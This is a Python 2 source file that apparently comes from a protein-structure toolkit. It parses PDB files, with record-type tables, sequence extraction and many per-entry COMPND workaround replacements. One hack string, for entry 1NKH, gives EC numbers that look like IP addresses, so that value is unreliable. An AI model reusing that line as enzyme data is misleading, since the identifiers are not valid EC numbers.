allowed_PDB_residues_types = protonated_residues_types_3.union(residue_types_3)
allowed_PDB_residues_and_nucleotides = allowed_PDB_residues_types.union(dna_nucleotides).union(rna_nucleotides)
### Parsing-related variables
COMPND_field_map = {
'MOL_ID' : 'MoleculeID',
'MOLECULE' : 'Name',
'CHAIN' : 'Chains',
'FRAGMENT' : 'Fragment',
'SYNONYM' : 'Synonym',
'EC' : 'EC',
'ENGINEERED' : 'Engineered',
'MUTATION' : 'Mutation',
'OTHER_DETAILS' : 'OtherDetails',
}
SOURCE_field_map = {
'MOL_ID' : 'MoleculeID',
'SYNTHETIC' : 'Synthetic',
'ORGANISM_SCIENTIFIC' : 'OrganismScientificName',
'ORGANISM_COMMON' : 'OrganismCommonName',
'ORGANISM_TAXID' : 'OrganismNCBITaxonomyID',
}
modified_residues_patch = {
'1A2C' : {
'34H' : 'UNK',
},
'2ATC' : {
'ASX' : 'ASN',
},
'1XY1' : {
'MPT' : 'UNK',
},
'1CVW' : { # Note: more recent versions of this file do not require this patch
'ANS' : 'UNK',
'0QE' : 'UNK',
},
'1FAK' : {
'CGU' : 'GLU', # Gamma-carboxy-glutamic acid
},
'1JXQ' : {
'PHQ' : 'UNK', # benzyl chlorocarbonate
'CF0' : 'UNK', # fluoromethane
},
'1YJ1' : {
'DGN' : 'GLN', # D-glutamine
},
'2CN0' : {
'SIN' : 'UNK', # Succinic acid
},
'2FTL' : {
'IAS' : 'ASP', # Beta-L-aspartic acid/L-isoaspartate. Mismatch to asparagine - "the expected l-Asn residue had been replaced with a non-standard amino acid" (10.1016/j.jmb.2006.11.003).
},
}
### Record types
order_of_records = [
"HEADER","OBSLTE","TITLE","SPLIT","CAVEAT","COMPND","SOURCE","KEYWDS",
"EXPDTA","NUMMDL","MDLTYP","AUTHOR","REVDAT","SPRSDE","JRNL","REMARK",
"DBREF","DBREF1","DBREF2","DBREF1/DBREF2","SEQADV","SEQRES","MODRES",
"HET","HETNAM","HETSYN","FORMUL","HELIX","SHEET","SSBOND","LINK","CISPEP",
"SITE","CRYST1","ORIGX1","ORIGX2","ORIGX3","SCALE1","SCALE2","SCALE3",
"MTRIX1","MTRIX2","MTRIX3","MODEL","ATOM","ANISOU","TER","HETATM",
"ENDMDL","CONECT","MASTER","END"
]
order_of_records = [x.ljust(6) for x in order_of_records]
allowed_record_types = set([
# One time, single line:
'CRYST1', # Unit cell parameters, space group, and Z.
'END ', # Last record in the file.
'HEADER', # First line of the entry, contains PDB ID code, classification, and date of deposition.
'NUMMDL', # Number of models.
'MASTER', # Control record for bookkeeping.
'ORIGXn', # Transformation from orthogonal coordinates to the submitted coordinates (n = 1, 2, or 3).
'SCALEn', # Transformation from orthogonal coordinates to fractional crystallographic coordinates (n = 1, 2, or 3).
# One time, multiple lines:
'AUTHOR', # List of contributors.
'CAVEAT', # Severe error indicator.
'COMPND', # Description of macromolecular contents of the entry.
'EXPDTA', # Experimental technique used for the structure determination.
'MDLTYP', # Contains additional annotation pertinent to the coordinates presented in the entry.
'KEYWDS', # List of keywords describing the macromolecule.
'OBSLTE', # Statement that the entry has been removed from distribution and list of the ID code(s) which replaced it.
'SOURCE', # Biological source of macromolecules in the entry.
'SPLIT ', # List of PDB entries that compose a larger macromolecular complexes.
'SPRSDE', # List of entries obsoleted from public release and replaced by current entry.
'TITLE ', # Description of the experiment represented in the entry.
# Multiple times, one line:
'ANISOU', # Anisotropic temperature factors.
'ATOM ', # Atomic coordinate records for standard groups.
'CISPEP', # Identification of peptide residues in cis conformation.
'CONECT', # Connectivity records.
'DBREF ', # Reference to the entry in the sequence database(s).
'HELIX ', # Identification of helical substructures.
'HET ', # Identification of non-standard groups heterogens).
'HETATM', # Atomic coordinate records for heterogens.
'LINK ', # Identification of inter-residue bonds.
'MODRES', # Identification of modifications to standard residues.
'MTRIXn', # Transformations expressing non-crystallographic symmetry (n = 1, 2, or 3). There may be multiple sets of these records.
'REVDAT', # Revision date and related information.
'SEQADV', # Identification of conflicts between PDB and the named sequence database.
'SHEET ', # Identification of sheet substructures.
'SSBOND', # Identification of disulfide bonds.
# Multiple times, multiple lines:
'FORMUL', # Chemical formula of non-standard groups.
'HETNAM', # Compound name of the heterogens.
'HETSYN', # Synonymous compound names for heterogens.
'SEQRES', # Primary sequence of backbone residues.
'SITE ', # Identification of groups comprising important entity sites.
# Grouping:
'ENDMDL', # End-of-model record for multiple structures in a single coordinate entry.
'MODEL ', # Specification of model number for multiple structures in a single coordinate entry.
'TER ', # Chain terminator.
# Other:
'JRNL ', # Literature citation that defines the coordinate set.
'REMARK', # General remarks; they can be structured or free form.
])
# This set is probably safer to use to allow backwards compatibility
all_record_types = allowed_record_types.union(set(order_of_records))
### Exception classes
class PDBParsingException(Exception): pass
class MissingRecordsException(Exception): pass
class NonCanonicalResidueException(Exception): pass
class PDBValidationException(Exception): pass
class PDBMissingMainchainAtomsException(Exception): pass
class PDB:
"""A class to store and manipulate PDB data"""
### Constructor ###
def __init__(self, pdb_content, pdb_id = None, strict = True):
'''Takes either a pdb file, a list of strings = lines of a pdb file, or another object.'''
self.pdb_content = pdb_content
if type(pdb_content) is types.StringType:
self.lines = pdb_content.split("\n")
else:
self.lines = [line.strip() for line in pdb_content]
self.parsed_lines = {}
self.structure_lines = [] # For ATOM and HETATM records
self.journal = None
self.chain_types = {}
self.format_version = None
self.modified_residues = None
self.modified_residue_mapping_3 = {}
self.pdb_id = None
self.strict = strict
self.seqres_chain_order = [] # A list of the PDB chains in document-order of SEQRES records
self.seqres_sequences = {} # A dict mapping chain IDs to SEQRES Sequence objects
self.atom_chain_order = [] # A list of the PDB chains in document-order of ATOM records (not necessarily the same as seqres_chain_order)
self.atom_sequences = {} # A dict mapping chain IDs to ATOM Sequence objects
self.chain_atoms = {} # A dict mapping chain IDs to a set of ATOM types. This is useful to test whether some chains only have CA entries e.g. in 1LRP, 1AIN, 1C53, 1HIO, 1XAS, 2TMA
# PDB deprecation fields
self.deprecation_date = None
self.deprecated = False
self.replacement_pdb_id = None
self.rosetta_to_atom_sequence_maps = {}
self.rosetta_residues = []
self.residue_types = set() # the set of 3-letter residue types present in the file (useful for checking against e.g. CSE, MSE)
self.fix_pdb()
self._split_lines()
self.pdb_id = pdb_id
self.pdb_id = self.get_pdb_id() # parse the PDB ID if it is not passed in
self._get_pdb_format_version()
self._get_modified_residues()
self._get_replacement_pdb_id()
self._get_SEQRES_sequences()
self._get_ATOM_sequences()
def fix_pdb(self):
'''A function to fix fatal errors in PDB files when they can be automatically fixed. At present, this only runs if
self.strict is False. We may want a separate property for this since we may want to keep strict mode but still
allow PDBs to be fixed.
The only fixes at the moment are for missing chain IDs which get filled in with a valid PDB ID, if possible.'''
if self.strict:
return
# Get the list of chains
chains = set()
for l in self.lines:
if l.startswith('ATOM ') or l.startswith('HETATM'):
chains.add(l[21])
# If there is a chain with a blank ID, change that ID to a valid unused ID
if ' ' in chains:
fresh_id = None
allowed_chain_ids = list(string.uppercase) + list(string.lowercase) + map(str, range(10))
for c in chains:
try: allowed_chain_ids.remove(c)
except: pass
if allowed_chain_ids:
fresh_id = allowed_chain_ids[0]
# Rewrite the lines
new_lines = []
if fresh_id:
for l in self.lines:
if (l.startswith('ATOM ') or l.startswith('HETATM')) and l[21] == ' ':
new_lines.append('%s%s%s' % (l[:21], fresh_id, l[22:]))
else:
new_lines.append(l)
self.lines = new_lines
### Class functions ###
@staticmethod
def from_filepath(filepath, strict = True):
'''A function to replace the old constructor call where a filename was passed in.'''
return PDB(read_file(filepath), strict = strict)
@staticmethod
def from_lines(pdb_file_lines, strict = True):
'''A function to replace the old constructor call where a list of the file's lines was passed in.'''
return PDB("\n".join(pdb_file_lines), strict = strict)
### Private functions ###
def _split_lines(self):
'''Creates the parsed_lines dict which keeps all record data in document order indexed by the record type.'''
parsed_lines = {}
for rt in all_record_types:
parsed_lines[rt] = []
parsed_lines[0] = []
for line in self.lines:
linetype = line[0:6]
if linetype in all_record_types:
parsed_lines[linetype].append(line)
else:
parsed_lines[0].append(line)
self.parsed_lines = parsed_lines
self._update_structure_lines() # This does a second loop through the lines. We could do this logic above but I prefer a little performance hit for the cleaner code
def _update_structure_lines(self):
'''ATOM and HETATM lines may be altered by function calls. When this happens, this function should be called to keep self.structure_lines up to date.'''
structure_lines = []
atom_chain_order = []
chain_atoms = {}
for line in self.lines:
linetype = line[0:6]
if linetype == 'ATOM ' or linetype == 'HETATM' or linetype == 'TER ':
chain_id = line[21]
self.residue_types.add(line[17:20].strip())
structure_lines.append(line)
if (chain_id not in atom_chain_order) and (chain_id != ' '):
atom_chain_order.append(chain_id)
if linetype == 'ATOM ':
atom_type = line[12:16].strip()
if atom_type:
chain_atoms[chain_id] = chain_atoms.get(chain_id, set())
chain_atoms[chain_id].add(atom_type)
if linetype == 'ENDMDL':
break
self.structure_lines = structure_lines
self.atom_chain_order = atom_chain_order
self.chain_atoms = chain_atoms
### Basic functions ###
def clone(self):
'''A function to replace the old constructor call where a PDB object was passed in and 'cloned'.'''
return PDB("\n".join(self.lines), pdb_id = self.pdb_id, strict = self.strict)
def get_content(self):
'''A function to replace the old constructor call where a PDB object was passed in and 'cloned'.'''
return '\n'.join(self.lines)
def write(self, pdbpath, separator = '\n'):
write_file(pdbpath, separator.join(self.lines))
def get_pdb_id(self):
'''Return the PDB ID. If one was passed in to the constructor, this takes precedence, otherwise the header is
parsed to try to find an ID. The header does not always contain a PDB ID in regular PDB files and appears to
always have an ID of 'XXXX' in biological units so the constructor override is useful.'''
if self.pdb_id:
return self.pdb_id
else:
header = self.parsed_lines["HEADER"]
assert(len(header) <= 1)
if header:
self.pdb_id = header[0][62:66]
return self.pdb_id
return None
def get_ATOM_and_HETATM_chains(self):
'''todo: remove this function as it now just returns a member element'''
return self.atom_chain_order
def get_annotated_chain_sequence_string(self, chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = True):
'''A helper function to return the Sequence for a chain. If use_seqres_sequences_if_possible then we return the SEQRES
Sequence if it exists. We return a tuple of values, the first identifying which sequence was returned.'''
if use_seqres_sequences_if_possible and self.seqres_sequences and self.seqres_sequences.get(chain_id):
return ('SEQRES', self.seqres_sequences[chain_id])
elif self.atom_sequences.get(chain_id):
return ('ATOM', self.atom_sequences[chain_id])
elif raise_Exception_if_not_found:
raise Exception('Error: Chain %s expected but not found.' % (str(chain_id)))
else:
return None
def get_chain_sequence_string(self, chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = True):
'''Similar to get_annotated_chain_sequence_string except that we only return the Sequence and do not state which sequence it was.'''
chain_pair = self.get_annotated_chain_sequence_string(chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = raise_Exception_if_not_found)
if chain_pair:
return chain_pair[1]
return None
def _get_modified_residues(self):
if not self.modified_residues:
modified_residues = {}
modified_residue_mapping_3 = {}
# Add in the patch
for k, v in modified_residues_patch.get(self.pdb_id, {}).iteritems():
modified_residue_mapping_3[k] = v
for line in self.parsed_lines["MODRES"]:
restype = line[24:27].strip()
restype_1 = residue_type_3to1_map.get(restype) or dna_nucleotides_2to1_map.get(restype)
if not restype_1:
assert(restype in rna_nucleotides)
restype_1 = restype
modified_residues["%s%s" % (line[16], line[18:23])] = {'modified_residue' : line[12:15], 'original_residue_3' : restype, 'original_residue_1' : restype_1}
modified_residue_mapping_3[line[12:15]] = restype
self.modified_residue_mapping_3 = modified_residue_mapping_3
self.modified_residues = modified_residues
def _get_replacement_pdb_id(self):
'''Checks to see if the PDB file has been deprecated and, if so, what the new ID is.'''
deprecation_lines = self.parsed_lines['OBSLTE']
date_regex = re.compile('(\d+)-(\w{3})-(\d+)')
if deprecation_lines:
assert(len(deprecation_lines) == 1)
tokens = deprecation_lines[0].split()[1:]
assert(len(tokens) == 3)
if self.pdb_id:
mtchs = date_regex.match(tokens[0])
assert(mtchs)
_day = int(mtchs.group(1))
_month = mtchs.group(2)
_year = int(mtchs.group(3)) # only two characters?
assert(tokens[1] == self.pdb_id)
self.deprecation_date = (_day, _month, _year) # no need to do anything fancier unless this is ever needed
self.deprecated = True
if len(tokens) == 3:
assert(len(tokens[2]) == 4)
self.replacement_pdb_id = tokens[2]
### PDB mutating functions ###
def strip_to_chains(self, chains, break_at_endmdl = True):
'''Throw away all ATOM/HETATM/ANISOU/TER lines for chains that are not in the chains list.'''
if chains:
chains = set(chains)
# Remove any structure lines not associated with the chains
self.lines = [l for l in self.lines if not(l.startswith('ATOM ') or l.startswith('HETATM') or l.startswith('ANISOU') or l.startswith('TER')) or l[21] in chains]
# For some Rosetta protocols, only one NMR model should be kept
if break_at_endmdl:
new_lines = []
for l in self.lines:
if l.startswith('ENDMDL'):
new_lines.append(l)
break
new_lines.append(l)
self.lines = new_lines
self._update_structure_lines()
# todo: this logic should be fine if no other member elements rely on these lines e.g. residue mappings otherwise we need to update or clear those elements here
else:
raise Exception('The chains argument needs to be supplied.')
def strip_HETATMs(self, only_strip_these_chains = []):
'''Throw away all HETATM lines. If only_strip_these_chains is specified then only strip HETATMs lines for those chains.'''
if only_strip_these_chains:
self.lines = [l for l in self.lines if not(l.startswith('HETATM')) or l[21] not in only_strip_these_chains]
else:
self.lines = [l for l in self.lines if not(l.startswith('HETATM'))]
self._update_structure_lines()
# todo: this logic should be fine if no other member elements rely on these lines e.g. residue mappings otherwise we need to update those elements here
def generate_all_point_mutations_for_chain(self, chain_id):
mutations = []
if self.atom_sequences.get(chain_id):
aas = sorted(residue_type_3to1_map.values())
aas.remove('X')
seq = self.atom_sequences[chain_id]
for res_id in seq.order:
r = seq.sequence[res_id]
assert(chain_id == r.Chain)
for mut_aa in aas:
if mut_aa != r.ResidueAA:
mutations.append(ChainMutation(r.ResidueAA, r.ResidueID, mut_aa, Chain = chain_id))
return mutations
### FASTA functions ###
def create_fasta(self, length = 80, prefer_seqres_order = True):
fasta_string = ''
if prefer_seqres_order:
chain_order, sequences = self.seqres_chain_order or self.atom_chain_order, self.seqres_sequences or self.atom_sequences
else:
chain_order, sequences = self.atom_chain_order or self.seqres_chain_order, self.atom_sequences or self.seqres_sequences
for c in chain_order:
if c not in sequences:
continue
fasta_string += '>%s|%s|PDBID|CHAIN|SEQUENCE\n' % (self.pdb_id, c)
seq = str(sequences[c])
for line in [seq[x:x+length] for x in xrange(0, len(seq), length)]:
fasta_string += line + '\n'
return fasta_string
### PDB file parsing functions ###
def _get_pdb_format_version(self):
'''Remark 4 indicates the version of the PDB File Format used to generate the file.'''
if not self.format_version:
version = None
version_lines = None
try:
version_lines = [line for line in self.parsed_lines['REMARK'] if int(line[7:10]) == 4 and line[10:].strip()]
except: pass
if version_lines:
assert(len(version_lines) == 1)
version_line = version_lines[0]
version_regex = re.compile('.*?FORMAT V.(.*),')
mtch = version_regex.match(version_line)
if mtch and mtch.groups(0):
try:
version = float(mtch.groups(0)[0])
except:
pass
self.format_version = version
def get_resolution(self):
resolution = None
resolution_lines_exist = False
for line in self.parsed_lines["REMARK"]:
if line[9] == "2" and line[11:22] == "RESOLUTION.":
#if id == :
# line = "REMARK 2 RESOLUTION. 3.00 ANGSTROMS.
# This code SHOULD work but there are badly formatted PDBs in the RCSB database.
# e.g. "1GTX"
#if line[31:41] == "ANGSTROMS.":
# try:
# resolution = float(line[23:30])
# except:
# raise Exception("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard. Expected data for diffraction experiments." % line )
#if line[23:38] == "NOT APPLICABLE.":
# resolution = "N/A"
#else:
# raise Exception("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard." % line )
#
# Instead, we use the code below:
if resolution:
raise Exception("Found multiple RESOLUTION lines.")
resolution_lines_exist = True
strippedline = line[22:].strip()
Aindex = strippedline.find("ANGSTROMS.")
if strippedline == "NOT APPLICABLE.":
resolution = "N/A"
elif Aindex != -1 and strippedline.endswith("ANGSTROMS."):
if strippedline[:Aindex].strip() == "NULL":
resolution = "N/A" # Yes, yes, yes, I know. Look at 1WSY.pdb.
else:
try:
resolution = float(strippedline[:Aindex].strip())
except:
raise PDBParsingException("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard. Expected data for diffraction experiments." % line )
else:
raise PDBParsingException("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard." % line )
if resolution_lines_exist and not resolution:
raise PDBParsingException("Could not determine resolution.")
return resolution
def get_title(self):
if self.parsed_lines.get("TITLE "):
return " ".join([line[10:80].strip() for line in self.parsed_lines["TITLE "] if line[10:80].strip()])
return None
def get_techniques(self):
techniques = None
technique_lines_exist = False
for line in self.parsed_lines["EXPDTA"]:
technique_lines_exist = True
techniques = line[10:71].split(";")
for k in range(len(techniques)):
techniques[k] = techniques[k].strip()
techniques = ";".join(techniques)
if technique_lines_exist and not techniques:
raise PDBParsingException("Could not determine techniques used.")
return techniques
def get_UniProt_ACs(self):
return [v['dbAccession'] for k, v in self.get_DB_references().get(self.pdb_id, {}).get('UNIPROT', {}).iteritems()]
def get_DB_references(self):
''' "The DBREF record provides cross-reference links between PDB sequences (what appears in SEQRES record) and
a corresponding database sequence." - http://www.wwpdb.org/documentation/format33/sect3.html#DBREF
'''
_database_names = {
'GB' : 'GenBank',
'PDB' : 'Protein Data Bank',
'UNP' : 'UNIPROT',
'NORINE': 'Norine',
'TREMBL': 'UNIPROT',
}
DBref = {}
for l in self.parsed_lines["DBREF "]: # [l for l in self.lines if l.startswith('DBREF')]
pdb_id = l[7:11]
chain_id = l[12]
seqBegin = int(l[14:18])
insertBegin = l[18]
seqEnd = int(l[20:24])
insertEnd = l[24]
database = _database_names[l[26:32].strip()]
dbAccession = l[33:41].strip()
dbIdCode = l[42:54].strip()
dbseqBegin = int(l[55:60])
idbnsBeg = l[60]
dbseqEnd = int(l[62:67])
dbinsEnd = l[67]
DBref[pdb_id] = DBref.get(pdb_id, {})
DBref[pdb_id][database] = DBref[pdb_id].get(database, {})
if DBref[pdb_id][database].get(chain_id):
if not(DBref[pdb_id][database][chain_id]['dbAccession'] == dbAccession and DBref[pdb_id][database][chain_id]['dbIdCode'] == dbIdCode):
raise PDBParsingException('This code needs to be generalized. dbIdCode should really be a list to handle chimera cases.')
else:
DBref[pdb_id][database][chain_id] = {'dbAccession' : dbAccession, 'dbIdCode' : dbIdCode, 'PDBtoDB_mapping' : []}
DBref[pdb_id][database][chain_id]['PDBtoDB_mapping'].append(
{'PDBRange' : ("%d%s" % (seqBegin, insertBegin), "%d%s" % (seqEnd, insertEnd)),
'dbRange' : ("%d%s" % (dbseqBegin, idbnsBeg), "%d%s" % (dbseqEnd, dbinsEnd)),
}
)
return DBref
def get_molecules_and_source(self):
# Check the COMPND lines
COMPND_lines = self.parsed_lines["COMPND"]
for x in range(1, len(COMPND_lines)):
assert(int(COMPND_lines[x][7:10]) == x+1)
if not COMPND_lines:
raise MissingRecordsException("No COMPND records were found. Handle this gracefully.")
# Concatenate the COMPND lines into one string, removing double spaces
COMPND_lines = " ".join([line[10:].strip() for line in COMPND_lines])
COMPND_lines.replace(" ", " ")
# Split the COMPND lines into separate molecule entries
molecules = {}
MOL_DATA = ["MOL_ID:%s".strip() % s for s in COMPND_lines.split('MOL_ID:') if s]
# Parse the molecule entries
# The hacks below are due to some PDBs breaking the grammar by not following the standard which states:
# Specification: A String composed of a token and its associated value separated by a colon.
# Specification List: A sequence of Specifications, separated by semi-colons.
# COMPND records are a specification list so semi-colons should not appear inside entries.
# The hacks below could probably be removed if I assumed that the standard was not followed (valid) by
# e.g. splitting the COMPND data by allowed tokens (the keys of COMPND_field_map)
# but I would want lots of tests in place first.
for MD in MOL_DATA:
# Hack for 2OMT
MD = MD.replace('EPITHELIAL-CADHERIN; E-CAD/CTF1', 'EPITHELIAL-CADHERIN: E-CAD/CTF1')
# Hack for 1M2T
MD = MD.replace('SYNONYM: BETA-GALACTOSIDE SPECIFIC LECTIN I A CHAIN; MLA; ML-I A;', 'SYNONYM: BETA-GALACTOSIDE SPECIFIC LECTIN I A CHAIN, MLA, ML-I A,')
# Hack for 1IBR
MD = MD.replace('SYNONYM: RAN; TC4; RAN GTPASE; ANDROGEN RECEPTOR- ASSOCIATED PROTEIN 24;', 'SYNONYM: RAN TC4, RAN GTPASE, ANDROGEN RECEPTOR-ASSOCIATED PROTEIN 24;')
# Hack for 1IBR
MD = MD.replace('SYNONYM: KARYOPHERIN BETA-1 SUBUNIT; P95; NUCLEAR FACTOR P97; IMPORTIN 90', 'SYNONYM: KARYOPHERIN BETA-1 SUBUNIT, P95, NUCLEAR FACTOR P97, IMPORTIN 90')
# Hack for 1NKH
MD = MD.replace('SYNONYM: B4GAL-T1; BETA4GAL-T1; BETA-1,4-GALTASE 1; BETA-1, 4-GALACTOSYLTRANSFERASE 1; UDP-GALACTOSE:BETA-N- ACETYLGLUCOSAMINE BETA-1,4-GALACTOSYLTRANSFERASE 1; EC: 172.16.58.3, 192.168.127.12, 192.168.3.11; ENGINEERED: YES; OTHER_DETAILS: CHAINS A AND B FORM FIRST, C AND D SECOND LACTOSE SYNTHASE COMPLEX',
'SYNONYM: B4GAL-T1, BETA4GAL-T1, BETA-1,4-GALTASE 1, BETA-1, 4-GALACTOSYLTRANSFERASE 1, UDP-GALACTOSE:BETA-N- ACETYLGLUCOSAMINE BETA-1,4-GALACTOSYLTRANSFERASE 1, EC: 172.16.58.3, 192.168.127.12, 192.168.3.11, ENGINEERED: YES, OTHER_DETAILS: CHAINS A AND B FORM FIRST, C AND D SECOND LACTOSE SYNTHASE COMPLEX')
# Hacks for 2PMI
MD = MD.replace('SYNONYM: SERINE/THREONINE-PROTEIN KINASE PHO85; NEGATIVE REGULATOR OF THE PHO SYSTEM;',
'SYNONYM: SERINE/THREONINE-PROTEIN KINASE PHO85, NEGATIVE REGULATOR OF THE PHO SYSTEM;')
MD = MD.replace('SYNONYM: PHOSPHATE SYSTEM CYCLIN PHO80; AMINOGLYCOSIDE ANTIBIOTIC SENSITIVITY PROTEIN 3;',
'SYNONYM: PHOSPHATE SYSTEM CYCLIN PHO80, AMINOGLYCOSIDE ANTIBIOTIC SENSITIVITY PROTEIN 3;')
# Hack for 1JRH
MD = MD.replace('FAB FRAGMENT;PEPSIN DIGESTION OF INTACT ANTIBODY', 'FAB FRAGMENT,PEPSIN DIGESTION OF INTACT ANTIBODY')
# Hack for 1KJ1
MD = MD.replace('SYNONYM: MANNOSE-SPECIFIC AGGLUTININ; LECGNA ', 'SYNONYM: MANNOSE-SPECIFIC AGGLUTININ, LECGNA ')
# Hack for 1OCC - The Dean and I
MD = MD.replace('SYNONYM: FERROCYTOCHROME C\:OXYGEN OXIDOREDUCTASE', 'SYNONYM: FERROCYTOCHROME C, OXYGEN OXIDOREDUCTASE')
# Hack for 2AKY
MD = MD.replace('SYNONYM: ATP\:AMP PHOSPHOTRANSFERASE, MYOKINASE', 'SYNONYM: ATP, AMP PHOSPHOTRANSFERASE, MYOKINASE')
# Hack for 3BCI
MD = MD.replace('SYNONYM: THIOL:DISULFIDE OXIDOREDUCTASE DSBA', 'SYNONYM: THIOL, DISULFIDE OXIDOREDUCTASE DSBA')
# Hack for 3BCI
MD = MD.replace('SYNONYM: THIOL:DISULFIDE OXIDOREDUCTASE DSBA', 'SYNONYM: THIOL, DISULFIDE OXIDOREDUCTASE DSBA')
# Hack for 1ELV
MD = MD.replace('FRAGMENT: CCP2-SP CATALYTIC FRAGMENT: ASP363-ASP-673 SEGMENT PRECEDED BY AN ASP-LEU SEQUENCE ADDED AT THE N-TERMINAL END',
'FRAGMENT: CCP2-SP CATALYTIC FRAGMENT; ASP363-ASP-673 SEGMENT PRECEDED BY AN ASP-LEU SEQUENCE ADDED AT THE N-TERMINAL END')
# Hack for 1E6E
MD = MD.replace('MOLECULE: NADPH\:ADRENODOXIN OXIDOREDUCTASE;', 'MOLECULE: NADPH;ADRENODOXIN OXIDOREDUCTASE;')
# Hack for 1JZD
MD = MD.replace('MOLECULE: THIOL:DISULFIDE INTERCHANGE PROTEIN', 'MOLECULE: THIOL;DISULFIDE INTERCHANGE PROTEIN')
# Hack for 1N2C
MD = MD.replace('OTHER_DETAILS: 2\:1 COMPLEX OF HOMODIMERIC FE-PROTEIN', 'OTHER_DETAILS: 2;1 COMPLEX OF HOMODIMERIC FE-PROTEIN')
# Hack for 1S6P
MD = MD.replace('MOLECULE: POL POLYPROTEIN [CONTAINS: REVERSE TRANSCRIPTASE]', 'MOLECULE: POL POLYPROTEIN [CONTAINS; REVERSE TRANSCRIPTASE]')
# Hack for 1Z9E
MD = MD.replace('FRAGMENT: SEQUENCE DATABASE RESIDUES 347-471 CONTAINS: HIV- 1 INTEGRASE-BINDING DOMAIN', 'FRAGMENT: SEQUENCE DATABASE RESIDUES 347-471 CONTAINS; HIV- 1 INTEGRASE-BINDING DOMAIN')
# Hacks for 2GOX
MD = MD.replace('FRAGMENT: FRAGMENT OF ALPHA CHAIN: RESIDUES 996-1287;', 'FRAGMENT: FRAGMENT OF ALPHA CHAIN; RESIDUES 996-1287;')
MD = MD.replace('FRAGMENT: C-TERMINAL DOMAIN: RESIDUES 101-165;', 'FRAGMENT: C-TERMINAL DOMAIN; RESIDUES 101-165;')
MOL_fields = [s.strip() for s in MD.split(';') if s.strip()]
molecule = {}
for field in MOL_fields:
field = field.split(":")
assert(1 <= len(field) <= 2)
if len(field) == 2: # Hack for 1MBG - missing field value
field_name = COMPND_field_map[field[0].strip()]
field_data = field[1].strip()
molecule[field_name] = field_data
### Normalize and type the fields ###
# Required (by us) fields
molecule['MoleculeID'] = int(molecule['MoleculeID'])
molecule['Chains'] = map(string.strip, molecule['Chains'].split(','))
for c in molecule['Chains']:
assert(len(c) == 1)
# Optional fields
if not molecule.get('Engineered'):
molecule['Engineered'] = None
elif molecule.get('Engineered') == 'YES':
molecule['Engineered'] = True
elif molecule.get('Engineered') == 'NO':
molecule['Engineered'] = False
else:
raise PDBParsingException("Error parsing ENGINEERED field of COMPND lines. Expected 'YES' or 'NO', got '%s'." % molecule['Engineered'])
if molecule.get('Mutation'):
if molecule['Mutation'] != 'YES':
raise PDBParsingException("Error parsing MUTATION field of COMPND lines. Expected 'YES', got '%s'." % molecule['Mutation'])
else:
molecule['Mutation'] = True
else:
molecule['Mutation'] = None
# Add missing fields
for k in COMPND_field_map.values():
if k not in molecule.keys():
molecule[k] = None
molecules[molecule['MoleculeID']] = molecule
# Extract the SOURCE lines
SOURCE_lines = self.parsed_lines["SOURCE"]
for x in range(1, len(SOURCE_lines)):
assert(int(SOURCE_lines[x][7:10]) == x+1)
if not SOURCE_lines:
raise MissingRecordsException("No SOURCE records were found. Handle this gracefully.")
# Concatenate the SOURCE lines into one string, removing double spaces
SOURCE_lines = " ".join([line[10:].strip() for line in SOURCE_lines])
SOURCE_lines.replace(" ", " ")
# Split the SOURCE lines into separate molecule entries
MOL_DATA = ["MOL_ID:%s".strip() % s for s in SOURCE_lines.split('MOL_ID:') if s]
# Parse the molecule entries
for MD in MOL_DATA:
MOL_fields = [s.strip() for s in MD.split(';') if s.strip()]
new_molecule = {}
for field in MOL_fields:
field = field.split(":")
if SOURCE_field_map.get(field[0].strip()):
field_name = SOURCE_field_map[field[0].strip()]
field_data = field[1].strip()
new_molecule[field_name] = field_data
MoleculeID = int(new_molecule['MoleculeID'])
assert(MoleculeID in molecules)
molecule = molecules[MoleculeID]
for field_name, field_data in new_molecule.iteritems():
if field_name != 'MoleculeID':
molecule[field_name] = field_data
# Normalize and type the fields
if not molecule.get('Synthetic'):
molecule['Synthetic'] = None
elif molecule.get('Synthetic') == 'YES':
molecule['Synthetic'] = True
elif molecule.get('Synthetic') == 'NO':
molecule['Synthetic'] = False
else:
raise PDBParsingException("Error parsing SYNTHETIC field of SOURCE lines. Expected 'YES' or 'NO', got '%s'." % molecule['Synthetic'])
# Add missing fields
for k in SOURCE_field_map.values():
if k not in molecule.keys():
molecule[k] = None
return [v for k, v in sorted(molecules.iteritems())]
def get_journal(self):
if self.parsed_lines["JRNL "]:
if not self.journal:
self.journal = JRNL(self.parsed_lines["JRNL "])
return self.journal.get_info()
return None
### Sequence-related functions ###
def _get_SEQRES_sequences(self):
'''Creates the SEQRES Sequences and stores the chains in order of their appearance in the SEQRES records. This order of chains
in the SEQRES sequences does not always agree with the order in the ATOM records.'''
pdb_id = self.get_pdb_id()
SEQRES_lines = self.parsed_lines["SEQRES"]
modified_residue_mapping_3 = self.modified_residue_mapping_3
# I commented this out since we do not need it for my current test cases
#for k, v in self.modified_residues.iteritems():
# assert(v['modified_residue'] not in modified_residues)
# modified_residues[v['modified_residue']] = v['original_residue_3']
for x in range(0, len(SEQRES_lines)):
assert(SEQRES_lines[x][7:10].strip().isdigit())
seqres_chain_order = []
SEQRES_lines = [line[11:].rstrip() for line in SEQRES_lines] # we cannot strip the left characters as some cases e.g. 2MBP are missing chain identifiers
# Collect all residues for all chains, remembering the chain order
chain_tokens = {}
for line in SEQRES_lines:
chainID = line[0]
if chainID not in seqres_chain_order:
seqres_chain_order.append(chainID)
chain_tokens[chainID] = chain_tokens.get(chainID, [])
chain_tokens[chainID].extend(line[6:].strip().split())
sequences = {}
self.chain_types = {}
for chain_id, tokens in chain_tokens.iteritems():
# Determine whether the chain is DNA, RNA, or a protein chain
# 1H38 is a good test for this - it contains DNA (chains E and G and repeated by H, K, N, J, M, P), RNA (chain F, repeated by I, L, O) and protein (chain D, repeated by A,B,C) sequences
# 1ZC8 is similar but also has examples of DU
# 4IHY has examples of DI (I is inosine)
# 2GRB has RNA examples of I and U
# 1LRP has protein chains with only CA atoms
# This will throw an exception when a non-canonical is found which is not listed in basics.py. In that case, the list in basics.py should be updated.
chain_type = None
set_of_tokens = set(tokens)
